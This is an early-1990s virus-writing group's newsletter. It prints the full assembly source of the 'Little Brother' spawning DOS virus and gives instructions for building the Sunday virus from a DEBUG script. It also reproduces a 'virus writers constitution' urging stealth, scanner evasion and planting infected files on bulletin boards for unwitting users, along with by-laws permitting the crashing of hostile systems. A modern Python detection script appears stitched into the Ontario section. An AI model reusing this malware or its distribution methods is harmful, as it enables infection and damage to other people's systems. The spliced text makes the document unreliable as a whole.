The Association of Really Cruel Viruses.

Welcome to the first ARCV Newsletter.... We hope you are all having a Spiffing Time out there....

First let's introduce the 'Team'.

    The Keyboard Basher - Apache Warrior.
    The Other One       - ICE-9.

Well you may or may not know that we here are one of the only Truly English Computer Underground Organisations (And just to piss off the Americans Out there we will spell everything with an 's' not a 'z').

In this and future newsletters we will be dodging Special Branch and New Scotland Yard as we go, as well as putting in the odd virus ASM file, Debug Dump for you all to have fun with. We will also provide information on what's happening (DUDE) out there in Computer Land.

Contents.

000..........................................................Contents.
001...................................Virus Spotlight, Little Brother.
002............................................ARCV Application Forms.
003.........................What is The ARCV, and Who are its Members.
004.....................................................Ontario Virus.
005......................................................Sunday Virus.
006...........................................................Closing.

The file in the Archive ARCVVIR.COM is a self displaying List of all the ARCV Viruses we have produced. (Requires ANSI.SYS)

Greetings...To

    The Guy Who Wrote CHAOS        - Thanks Bud
    The Guy Who Wrote FU MANCHU    - Are you English?
    Patti 'VSUM' Hoffman           - We are here to make your Life HELL!
    John McAfee                    - To Think if it wasn't for us you'd be Unemployed
    The Guy Who Wrote MICHELANGELO - Get a LIFE!!!!!!!!!!!!!
    Terry Pratchett                - You Are COOOOOOOOL! And Are Carnivorous Plants Really that Boring?

ARCV NEWS 001.

- Virus Spotlight - Little Brother.

Now this virus is rather crafty as it relies on good old MSDOS program handling to work, i.e.
The Fact that .COM files are always loaded before .EXE files.

First let's see what Patti has to say.

 Virus Name:  Little Brother
 Aliases:
 V Status:    Rare
 Discovered:  October, 1991
 Symptoms:    307 byte .COM files
 Origin:      The Netherlands
 Eff Length:  307 Bytes
 Type Code:   SRCE - Spawning Resident .EXE Infector
 Detection Method:  ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+
 Removal Instructions:  Delete infected .COM programs

 General Comments:

 The Little Brother virus was submitted from the Netherlands in October, 1991. This virus is a spawning virus similar in technique to the Aids 2 and Twin-351 viruses.

 The first time a program infected with Little Brother is executed, Little Brother will become memory resident in a "hole" in low system memory in the system data area, hooking interrupt 21. There will be no change in total system or available free memory.

 Once resident, the Little Brother virus will infect .EXE programs when they are executed. The .EXE program itself will not be altered, but a corresponding .COM program will be created by the virus of 307 bytes. This corresponding .COM program will contain pure virus code and have a date/time stamp in the DOS directory of when it was created. The following text strings can be found in the 307 byte .COM files:

     "Little Brother"
     "EXE COM"

 Since DOS will execute .COM programs before .EXE programs, whenever the user attempts to execute a .EXE program, the corresponding .COM program will be executed first. The .COM program, when finished will then start the .EXE program the user was attempting to execute.

Well let's get to the Asm source.

--------------------------------------------------------------------------- cseg segment assume cs:cseg,ds:cseg,es:nothing org 100h FILELEN equ quit - begin RESPAR equ (FILELEN/16) + 17 VER_ION equ 1 oi21 equ quit nameptr equ quit+4 DTA equ quit+8 .RADIX 16 ;************************************************************************** ;* Start the program!
;************************************************************************** begin: cld mov ax,0DEDEh ;already installed? int 21h cmp ah,041h je cancel mov ax,0044h ;move program to empty hole mov es,ax mov di,0100h mov si,di mov cx,FILELEN rep movsb mov ds,cx ;get original int21 vector mov si,0084h mov di,offset oi21 movsw movsw push es ;set vector to new handler pop ds mov dx,offset ni21 mov ax,2521h int 21h cancel: ret ;************************************************************************** ;* File-extensions ;************************************************************************** EXE_txt db 'EXE',0 COM_txt db 'COM',0 ;************************************************************************** ;* Interupt handler 24 ;************************************************************************** ni24: mov al,03 iret ;************************************************************************** ;* Interupt handler 21 ;************************************************************************** ni21: pushf cmp ax,0DEDEh ;install-check ? je do_DEDE push dx push bx push ax push ds push es cmp ax,4B00h ;execute ? jne exit doit: call infect exit: pop es pop ds pop ax pop bx pop dx popf jmp dword ptr cs:[oi21] ;call to old int-handler do_DEDE: mov ax,04100h+VER_ION ;return a signature popf iret ;************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;************************************************************************** infect: cld mov word ptr cs:[nameptr],dx ;save the ptr to the ;filename mov word ptr cs:[nameptr+2],ds push cs ;set new DTA pop ds mov dx,offset DTA mov ah,1Ah int 21 call searchpoint mov si,offset EXE_txt ;is extension 'EXE'? 
mov cx,3 rep cmpsb jnz do_com do_exe: mov si,offset COM_txt ;change extension to COM call change_ext mov ax,3300h ;get ctrl-break flag int 21 push dx xor dl,dl ;clear the flag mov ax,3301h int 21 mov ax,3524h ;get int24 vector int 21 push bx push es push cs ;set int24 vec to new handler pop ds mov dx,offset ni24 mov ax,2524h int 21 lds dx,dword ptr [nameptr] ;create the file (unique ;name) xor cx,cx mov ah,5Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,FILELEN ;write the file mov dx,offset begin mov ah,40h int 21 cmp ax,cx pushf mov ah,3Eh ;close the file int 21 popf jz return1 ;all bytes written? lds dx,dword ptr [nameptr] ;delete the file mov ah,41h int 21 return1: pop ds ;restore int24 vector pop dx mov ax,2524h int 21 pop dx ;restore ctrl-break flag mov ax,3301h int 21 mov si,offset EXE_txt ;change extension to EXE call change_ext return: ret do_com: call findfirst ;is the file a virus? cmp word ptr cs:[DTA+1Ah],FILELEN jne return mov si,offset EXE_txt ;does the EXE-variant exist? call change_ext call findfirst jnc return mov si,offset COM_txt ;change extension to COM jmp short change_ext ;************************************************************************** ;* Find the file ;************************************************************************** findfirst: lds dx,dword ptr [nameptr] mov cl,27h mov ah,4Eh int 21 ret ;************************************************************************** ;* change the extension of the filename (CS:SI -> ext) ;************************************************************************** change_ext: call searchpoint push cs pop ds movsw movsw ret ;************************************************************************** ;* search begin of extension ;************************************************************************** searchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,'.' 
repnz scasb ret ;************************************************************************** ;* Text and Signature ;************************************************************************** db 'Little Brother',0 quit: cseg ends end begin

Quite a Simple idea for a virus but it works.

Apache.

ARCV NEWS 002.

Well I thought it could be a good idea if I put in the relevant ARCV Application forms for any one who may wish to join the ranks of the ARCV. At the moment we are looking for MAC Virus programmers, and AMIGA Virus Programmers and others. Also we are looking for Couriers for the ARCV (BBS's for Distribution), that are based all over the world in Britain, USA and Eastern Europe Mainly but other countries will get equal consideration. So less of the waffle and to the Applications.

---------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                  THE ASSOCIATION OF REALLY CRUEL VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Association of Really Cruel Viruses
Courier and/or Membership Application Form

For any purpose other than to evaluate this application, the data in all sections of this application shall not be disclosed outside the internal leadership of the ARCV. For more ARCV information please see ARCV prologue.

---------------------------------------------------------------------------
FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are hereby fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
---------------------------------------------------------------------------

PART A: Background Information

 1. Date of Application:__________________________________

 2. Applicants Name (Last,First,Middle,Maiden):
    ______________________________________________________

 3. Applicants Current Handle:____________________________

 4. List all other Handles by which you have been known.
    ______________________________________________________
    ______________________________________________________

 5. Residence Address (Number,Street,City or Town,County and Post Code):
    _______________________________________________________
    _______________________________________________________
    _______________________________________________________

 6. Home Telephone Number (Area Code and Number):
    _______________________________________________________

 7. Home Data Number (Area Code and Number):
    _______________________________________________________

 8. Fidonet Contact address (full address, including name to contact):
    _______________________________________________________
    _______________________________________________________

 9. Age:__________ Date of Birth:_________________________

10. Marital Status: ___ Married ___ Separated ___ Single ___ Divorced

11. Nationality __________________________________________

12. Have you at any time used a virus? YES/NO ____________
    If Yes, explain: _____________________________________
    ______________________________________________________
    ______________________________________________________

13. Have you at any time been the victim of a virus attack? YES/NO _________________
    If yes, explain: _____________________________________
    ______________________________________________________
    ______________________________________________________

Part B: Legal Information

 1. Have You ever been convicted in any court of a crime punishable by imprisonment for a term exceeding 1 year?
    No _____ Yes ____ If yes, explain: _____________________________
    _______________________________________________________
    _______________________________________________________

 2. Are you currently on Probation,Parole,a Work-Release Program or Released on Personal Recognizance or Bond Pending Court Action?
    No _____ Yes ____ If yes, explain: ______________________________
    _______________________________________________________
    _______________________________________________________

 3. Are you Now or ever have been a member of any form of Law Enforcement Agency, Such as: FBI,Secret Service,NSA, CIA,BATF,State or Local Police,Special Branch etc.?
    No _____ Yes ____ If yes, explain: _____________________________
    _______________________________________________________
    _______________________________________________________

 4. Are you Now or ever have been a member of any form of group that investigates the Computer Underground? Such as: Software Publishers Association,etc.
    No _____ Yes ____ If yes, explain: _____________________________
    _______________________________________________________
    _______________________________________________________

 5. Do you belong To any Organized Computer Club or Group?
    No _____ Yes ____ If yes, explain: _____________________________
    _______________________________________________________
    _______________________________________________________

Part C: ARCV Information

 1. Are you applying to be:
    An ARCV Member  __________
    An ARCV Courier __________
    Both            __________

 2. If applying to be a member, Explain in detail your reason for wanting to be a member of the ARCV.
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________
    _____________________________________________________________________

 3. What kind of position do you wish to hold in the ARCV?
    ____________________________________________________________________
    ____________________________________________________________________
    ____________________________________________________________________

Part D: Qualifications

 1. Which Programming languages do you know WELL? (Place X in Boxes)
    [ ] Assembler
    [ ] Basic
    [ ] Cobol
    [ ] C (Turbo, Ansi)
    [ ] Fortran
    [ ] Pascal (Turbo, Others)

 2. Which Programming languages are you familiar with (Place x in Boxes)
    [ ] Assembler
    [ ] Basic
    [ ] Cobol
    [ ] C (Turbo, Ansi)
    [ ] Fortran
    [ ] Pascal (Turbo, Others)

 3. Have you ever written a virus? (No Trojans Please)
    No _______ Yes ______ If yes, explain: ___________________________
    _______________________________________________________
    _______________________________________________________
    _______________________________________________________

 4. If you answered NO to the above DON'T answer this... Is the virus you've written in the Public Domain? (ie. Is it released?)
    No _______ Yes ______ If yes, explain: ___________________________
    _______________________________________________________
    _______________________________________________________
    _______________________________________________________

 5. If you've written a virus are you willing for it to be placed in our virus library?
    No _______ Yes ______

 6. Do you have a virus collection?
    No _______ Yes ______ If yes, explain (Please include number in collection)
    _______________________________________________________
    _______________________________________________________
    _______________________________________________________
    ________________________________________________________

ARCV By-Laws:

---------------------------------------------------------------------------
Section 1A-1

ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B)

---------------------------------------------------------------------------
Section 1a-2 DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER

In any prosecution for any Crime under Law, in which the member was not the only participant, it shall be recognized that no ARCV member shall provide information on any current ARCV member to any member of the Media or Law Enforcement Agencies.

---------------------------------------------------------------------------
Section 1a-3 USE OF DEADLY HACKING FORCE

Except as provided in these sub-sections, No ARCV member shall ever damage delete or in any way tamper with a computer network or system.

Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV propaganda may be crashed or deleted.

Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members phone numbers,Password, or personal information may be crashed or deleted.

Exception 1a-3-3 : Any system so approved by the ARCV Council.

---------------------------------------------------------------------------
Section 1a-4 DISCLOSURE OF PROPRIETARY INFORMATION

No ARCV member shall distribute confidential ARCV information.
This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork, Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement Agency, Without the prior permission of the ARCV Council.

---------------------------------------------------------------------------
Section 1a-5 CONTRIBUTION OF INFORMATION

All ARCV Members are expected to contribute to the ARCV as a whole, and to provide information obtained on their own. Members shall not just use information provided by other members or non-members.

---------------------------------------------------------------------------
Section 1a-6 DISCLOSURE OF MEMBERSHIP

All ARCV members will not allow any Non-member to use his/her password, ID,Handle or name. And No member shall post or provide any members name password or phone number on any computer system without the prior consent of said member. All members will leave his/her name or phone number on a system or network at their own discretion and risk.

---------------------------------------------------------------------------
APPENDIX A:

 1. All Information should be FREE!
 2. Promote Decentralization - Mistrust Authority
 3. Access to computers should be unlimited and Total
 4. Hackers should be judged by their hacking ability
 5. You can create art and beauty on a computer
 6. Computers can change your life for the better.

___________________________________________________________________________
APPENDIX B:

***

-------------------------------------------
The Constitution of Worldwide Virus Writers
-------------------------------------------
    Initial Release - February 12, 1992
-------------------------------------------

ARTICLE I - REGARDING ORIGINAL VIRII

Section A - DEFINITION

The term "original virus" herein indicates programming done exclusively by either one individual or group, with no code taken from any other source, be it a book or another virus.
Section B - CODE REQUIREMENTS

For an original virus to conform to the standards set by this document, it must include the following:

 1) The title of the virus in square brackets followed by a zero byte should be in the code, in a form suitable for inclusion into SCAN(1). This is to ensure that the name of the virus is known to those examining it.
 2) The name of the author and his/her group affiliation/s should be included in the code, followed by a zero byte. At the present, this is an optional requirement.
 3) Some form of encryption or other form of stealth techniques must be used. Even a simple XOR routine will suffice.
 4) If the virus infects files, the code should be able to handle infection of read only files.
 5) It must have some feature to distinguish it from other virii. Creativity is encouraged above all else.
 6) The virus must not be detectable by SCAN.

Section C - IMPLEMENTATION

This section, and all sections hereafter bearing the heading "IMPLEMENTATION" refer to the recommended method of implementation of the suggestions/requirements listed in the current article.

 1) Virus_Name db '[Avocado]',0
 2) Author db 'Dark Angel, PHALCON/SKISM',0

ARTICLE II - REGARDING "HACKED" VIRII

Section A - DEFINITION

The term "hacked virus" herein refers to any virus written by either one individual or a group which includes code taken from any other source, be it a book, a code fragment, or the entire source code from another virus.

The term "source virus" herein refers to the virus which spawned the "hacked virus."

Section B - CODE REQUIREMENTS

For a "hacked" virus to conform to the standards set forth by this document, it must include the following, in addition to all the requirements set down in Article I of this document:

 1) The title, author (if available), and affiliation of the author (if available) of the original virus.
 2) The author of the hacked virus must give the source code of said virus to the author of the source virus upon demand.
 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark Avenger hacks are to be written.
 4) The source virus must be improved in some manner (generally in efficiency of speed or size).
 5) The hacked virus must significantly differ from the source virus, i.e. it cannot be simply a text change.

Section C - IMPLEMENTATION

 1) Credit db 'Source stolen from Avocado by Dark Angel of PHALCON/SKISM',0

ARTICLE III - REGARDING VIRAL STRAINS

Section A - DEFINITION

The term "viral strain" herein refers to any virus written by the original author which does not significantly differ from the original. It generally implies a shrinking in code size, although this is not required.

Section B - CODE REQUIREMENTS

For a "viral strain" to conform to the standards set by this document, it must include the following, in addition to all the requirements set down in Article I of this document:

 1) The name of the virus shall be denoted by the name of the original virus followed by a dash and the version letter.
 2) The name of the virus must not change from that of the original strain.
 3) A maximum of two strains of the virus can be written.

Section C - IMPLEMENTATION

 1) Virus_Name db '[Avocado-B]',0

ARTICLE IV - DISTRIBUTION

Section A - DEFINITION

The term "distribution" herein refers to the transport of the virus through an infected file to the medium of storage of a third (unwitting) party.

Section B - INFECTION MEDIUM

The distributor shall infect a file with the virus before uploading. Suggested files include:

 1) Newly released utility programs.
 2) "Hacked" versions of popular anti-viral software, i.e. the version number should be changed, but little else.
 3) Beta versions of any program.

The infected file, which must actually do something useful, will then be uploaded to a board.
The following boards are fair game:

 1) PD Boards
 2) Lamer boards
 3) Boards where the sysop is a dick

No virus shall ever be uploaded, especially by the author, directly to an antivirus board, such as HomeBase or Excalibur.

Section C - BINARY AND SOURCE CODE AVAILABILITY

The binary of the virus shall not be made available until at least two weeks after the initial (illicit) distribution of the virus. Further, the source code, which need not be made available, cannot be released until the latest version of SCAN detects the virus. The source code, should it be made available, should be written in English.

Section D - DOCUMENTATION

Documentation can be included with the archive containing the binary of the virus, although this is optional. The author should include information about the virus suitable for inclusion in the header of VSUM(2). A simple description will follow, though the author need not reveal any "hidden features" of the virus. Note this serves two purposes:

 1) Enable others to effectively spread the virus without fear of self-infection.
 2) Ensure that your virus gets a proper listing in VSUM.

ARTICLE V - AMENDMENTS

Section A - PROCEDURE

To propose an amendment, you must first contact a PHALCON/SKISM member through one of our member boards. Leave a message to one of us explaining the proposed change. It will then be considered for inclusion. A new copy of the Constitution will then be drafted and placed on member boards under the filename "PS-CONST.TXT" available for free download by all virus writers. Additionally, an updated version of the constitution will be published periodically in our newsletter.

Section B - AMENDMENTS

None as of this writing.

ARTICLE VI - MISCELLANEOUS

Section A - WHO YOU CAN MAKE FUN OF

This is a list of people who, over the past few years, have proved themselves to be inept and open to ridicule.

 1) Ross M. Greenberg, author of FluShot+
 2) Patricia (What's VSUM?) Hoffman.
 2) People who post "I am infected by Jerusalem, what do I do?" or "I have 20 virii, let's trade!"
 3) People who don't know the difference between a virus and a trojan.
 4) Lamers and "microwares puppies"

Section B - WHO YOU SHOULDN'T DIS TOO BADLY

This is a list of people who, over the past few years, have proved themselves to be somewhat less inept and open to ridicule than most.

 1) John McAfee, nonauthor of SCAN
 2) Dennis, true author of SCAN

Section C - MOTIVATION

In most cases, the motivation for writing a virus should not be the pleasure of seeing someone else's system trashed, but to test one's programming abilities.

----------
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own name.

___________________________________________________________________________

For those applying for courier membership if we feel you are suitable we will be in touch to discuss the extra details. The usual first contact will be by means of a Fidonet address or a written letter.

For those applying for normal membership then we will contact you at your Fidonet address, with the extra details of the membership and a list of boards that we can be contacted through.

___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are hereby fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!

I agree to the By-Laws and statements put forth on this document

NAME: _______________________________

DATE: _______________________________

To return your Application please return to Apache Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this from. Please fill in the Machine Configuration data sheet and return to the above address.

***

PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution.
***

---------------------------------------------------------------------------
The ARCV'92                         May the Great A'Tuin keep going........
---------------------------------------------------------------------------

Well that's the Application form, next is the machine spec. form. This gives us an indication of the kind of computer system you run.

---------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                  THE ASSOCIATION OF REALLY CRUEL VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Association of Really Cruel Viruses.
Machine Configuration Form.

Please fill in all the questions truthfully as they will help us decide what you can offer our group.

___________________________________________________________________________

 1. Date of Application:__________________________________

 2. Applicants Name (Last,First,Middle,Maiden):
    ______________________________________________________

 3. Applicants Current Handle:____________________________

 4. Machine Type. (Place an X in the boxes appropriate)
    [ ] IBM PC.
    [ ] AMIGA.
    [ ] ATARI ST.
    [ ] MAC.
    [ ] ARCHIMEDES.
    [ ] OTHER, (Please State).

 5. If you answered IBM PC to the above please answer below. What type of IBM PC do you have.
    [ ] 8086/88 Based
    [ ] 80286 Based
    [ ] 80386 (SX/DX) Based
    [ ] 80486 (SX/DX/DX2) Based
    [ ] PS/2

 6. If you have a machine other than that of an IBM PC please state processor type and manufacturer.
    _______________________________________________________________
    _______________________________________________________________
    _______________________________________________________________

 7. Do you have any of the following equipment.
    [ ] Hard Disk, enter size and type: ______________________________
        ______________________________________________________________
    [ ] Modem, enter model and max speed: ____________________________
        ______________________________________________________________
    [ ] Printer
        [ ] 9 pin Dot Matrix
        [ ] 24 pin Dot Matrix
        [ ] Laser Printer
        [ ] Ink Jet type
        [ ] Colour
    [ ] Monochrome Display.
    [ ] CGA Display, or equivalent.
    [ ] EGA Display, or equivalent.
    [ ] VGA Display, or equivalent.
    [ ] SVGA Display, or equivalent.
    [ ] 5¼ inch 360K floppy.
    [ ] 5¼ inch 1.2Mb floppy.
    [ ] 3½ inch 720Kb floppy.
    [ ] 3½ inch 1.44Mb floppy.
    [ ] Other Please State: __________________________________________

 8. What Kind of Anti-Virus Software do you use:
    _______________________________________________________________
    _______________________________________________________________

 9. Do you believe in Virus Research? YES/NO _______________________

10. Do you Hack? YES/NO ___________________________________________

11. If so what kind of Systems? ___________________________________
    _______________________________________________________________

12. Do you run a BBS? YES/NO ______________________________________

13. If so please state BBS configuration. inc. Software, Machines.
    _______________________________________________________________
    _______________________________________________________________
    _______________________________________________________________
    _______________________________________________________________
    _______________________________________________________________

14. If you have a BBS are you willing for us to use it? YES/NO _____

___________________________________________________________________________

This is all for now and we may ask further questions regarding your computer setups. Thank you for your time.
___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are hereby fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!

I agree to the statements put forth on this document

NAME: _______________________________

DATE: _______________________________

To return your Machine Configuration data sheet please return to Apache Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this from.

---------------------------------------------------------------------------
The ARCV'92                     Octarine - The Pigment of Imagination......
---------------------------------------------------------------------------

ARCV NEWS 003.

The Association of Really Cruel Viruses.

This is one of the first English Computer Underground groups, although we are an English organisation we can only be contacted through American or Eastern Europe Virus boards. Or we will contact through a Fidonet address.

What is The ARCV.

ARCV is an organisation that is involved in Writing and Research of computer viruses. We hold a Library of IBM Computer viruses for the use of the ARCV members. But as a group we are involved in viruses for most of the main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly newsletter with the latest virus news from around the country and from around the world, virus Dis-Assemblies and other virus Debug Scripts. We have links with PHALCON/SKISM in the US, we also have links with some Eastern Europe Virus writers. Our group is not only limited to virus activities but other 'Underground' activities also (Hacking, Phreaking etc.) so any new members who don't write viruses could be involved in any of the other activities we are involved in.

Our members come from the youths of today, at the moment we are mainly English students that wish to beat and know more about the system.
We come from a range of backgrounds, from the Electronics side and the Computer side. I myself, Apache Warrior, come mainly from the Electronics side but branched to the Computer side fully around 2 years ago. I Hack, Phreak and write Viruses. I am the President of the group (after all I started the group) and I am somewhat of an expert on beating the BT phone exchange, and being a BBS-aholic, that comes in very handy. Now ICE-9 is also an Electronics guy who turned to the computer; he writes viruses and is into Heavy Metal.

Now the picture put out by the Anti-Virus Authors is that Virus writers are Sad individuals who wear Anoraks and go Train Spotting, but well, they are sadly mistaken: we are very intelligent, sound minded, highly trained, and we wouldn't be seen in an Anorak or near an Anorak even if dead.

We aim to provide the ARCV members and some Non-Members an insight into the computer underground world, and would you believe it, it is huge. The Group is always seeking new members and we require new members to stay afloat. Soon we will be opening the world HQ in the UK. This will have special access areas for the ARCV members; these will include access to the ARCV Virus Library, all of which are legit viruses and No Trojans.

ARCV NEWS 004.

The Ontario Virus

Well here's a virus from Canada.

V Status: Rare
Discovered: July, 1990
Symptoms: .COM & .EXE growth; decrease in system and free memory; hard disk errors in the case of extreme infections
Origin: Ontario, Canada
Eff Length: 512 Bytes
Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV
Removal Instructions: SCAN /D, or Delete infected files

General Comments:

The Ontario Virus was isolated by Mike Shields in Ontario, Canada in July, 1990. The Ontario virus is a memory resident infector of .COM, .EXE, and overlay files. It will infect COMMAND.COM.
The first time a program infected with the Ontario Virus is executed, it will install itself memory resident above the top of system memory but below the 640K DOS boundary. Total system memory and free memory will be decreased by 2,048 bytes. At this time, the virus will infect COMMAND.COM on the C: drive, increasing its length by 512 bytes.

Each time an uninfected program is executed on the system with the virus memory resident, the program will become infected with the viral code located at the end of the file. For .COM files, they will increase by 512 bytes in all cases. For .EXE and overlay files, the file length increase will be 512 - 1023 bytes. The difference in length for .EXE and overlay files is because the virus will fill out the unused space at the end of the last sector of the uninfected file with random data (usually a portion of the directory) and then append itself to the end of the file at the next sector. Systems using a sector size of more than 512 bytes may notice larger file increases for infected files. Infected files will always have a file length that is a multiple of the sector size on the disk.

In the case of extreme infections of the Ontario Virus, hard disk errors may be noticed.

Ontario uses a complex encryption routine, and a simple identification string will not identify this virus.
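Because the description says a simple identification string will not find Ontario, the file-growth figures it gives are the practical triage signal. The following is an added example, not part of the original newsletter: it compares a known-good size baseline with current sizes and flags files whose growth fits the described pattern. It assumes 512-byte sectors only, assumes ".ovl" as the overlay extension, and all file names and sizes are constructed.

```python
import os

VIRUS_LEN = 512                   # "Eff Length" from the description
SECTOR = 512                      # assumption: larger sectors are not modelled
PADDED_EXTS = {".exe", ".ovl"}    # ".ovl" for overlay files is an assumption

def expected_infected_size(clean_size, ext):
    """Size the description predicts for an infected copy of a clean file."""
    ext = ext.lower()
    if ext == ".com":
        # .COM files grow by exactly 512 bytes in all cases.
        return clean_size + VIRUS_LEN
    if ext in PADDED_EXTS:
        # The last sector is filled out, then 512 bytes are appended at the
        # next sector boundary, giving growth of 512 to 1023 bytes.
        padded = -(-clean_size // SECTOR) * SECTOR
        return padded + VIRUS_LEN
    return None                   # file type not covered by the description

def triage(baseline, current):
    """Return sorted names whose size change matches the described growth."""
    hits = []
    for name, clean_size in baseline.items():
        now = current.get(name)
        if now is None or now == clean_size:
            continue              # missing or unchanged: nothing to compare
        ext = os.path.splitext(name)[1]
        if now == expected_infected_size(clean_size, ext):
            hits.append(name)
    return sorted(hits)

# Constructed sample data: sizes recorded on a clean system vs. sizes now.
BASELINE = {"COMMAND.COM": 25307, "EDIT.COM": 413, "CHKDSK.EXE": 9819,
            "FORMAT.EXE": 22923, "DRAW.OVL": 4096, "README.TXT": 100}
CURRENT = {"COMMAND.COM": 25819, "EDIT.COM": 413, "CHKDSK.EXE": 10752,
           "FORMAT.EXE": 23000, "DRAW.OVL": 4608, "README.TXT": 612}

if __name__ == "__main__":
    for name in triage(BASELINE, CURRENT):
        print(f"{name}: {BASELINE[name]} -> {CURRENT[name]} bytes")
```

A size match is only a reason to look closer, since a legitimate update can produce the same growth; files flagged this way still need checking with a scanner or against known-good copies.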
---------------------------------------------------------------------------
Apache..

ARCV NEWS 005.

The Sunday Virus

According to Patti Hoffman, the Sunday virus is based on the Jerusalem viruses, because the codes for both viruses are similar. Sunday infects COM, EXE, and OVL files when they are executed, and it stays resident in memory. It was circulated around the Seattle, Washington area in 1989, and is very common. However, this version of Sunday doesn't seem to print any messages on the screen every Sunday, like some of the other versions do. This virus spreads rapidly, and is a great replicator.

To create SUNDAY.COM, cut out the following code, and name the resulting file sunday.scr. Then, use this command:

    DEBUG < SUNDAY.SCR

This will then produce the .COM all ready for use.

---------------------------------------------------------------------------

ARCV NEWS 006.

Closing.

Well, that's it for this time. The mag in future will be a Bi-Monthly affair, and I now offer out to you all to send in any article for inclusion in future issues. Well, I'm not sure what will be in next month, but we should have the Asm source for Commander Bomber Virus and much more.